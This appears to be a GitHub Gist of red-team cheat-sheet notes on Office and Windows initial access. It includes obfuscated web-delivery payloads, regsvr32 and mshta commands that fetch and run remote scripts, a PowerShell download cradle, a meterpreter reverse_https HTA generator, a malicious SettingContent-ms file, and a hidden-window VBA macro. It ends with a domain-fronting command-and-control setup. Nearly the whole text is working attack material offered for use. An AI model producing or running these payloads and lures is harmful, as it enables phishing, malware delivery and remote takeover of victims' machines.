Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
2. Generate Macro (by enigma0x3)
iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generat
e-Macro/master/Generate-Macro.ps1');
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1
3. Macroless OLE SettingContent-ms
python unicorn.py windows/meterpreter/reverse_https IP 443 hta
--------------------------
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
<ApplicationInformation>
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
<DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
<Icon>%windir%\system32\control.exe</Icon>
</ApplicationInformation>
<SettingIdentity>
<PageID></PageID>
<HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
</SettingIdentity>
<SettingInformation>
<Description>@shell32.dll,-4161</Description>
<Keywords>@shell32.dll,-4161</Keywords>
</SettingInformation>
</SearchableContent>
</PCSettings>
--------------------------
* Nota, dar permisos 644 a la Database en el C&C
4. .MAM Access Database
------------------------------
Public Function runme()
runcalculator
End Function
Sub runcalculator()
Shell ("mshta.exe http://IP/LICENSE.txt")
End Sub
------------------------------
5. SyncAppvPublishingServer
--------------------------------------------------
Sub Macro()
Dim x64 As String
x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL"""
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create x64
End Sub
--------------------------------------------------------
6. Domain Fronting + Phishing
Redirector:
socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443
C&C:
set LHOST mscrl.microsoft.com
set HttpHostHeader xxxxxxxxxxxxx.azureedge.net
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.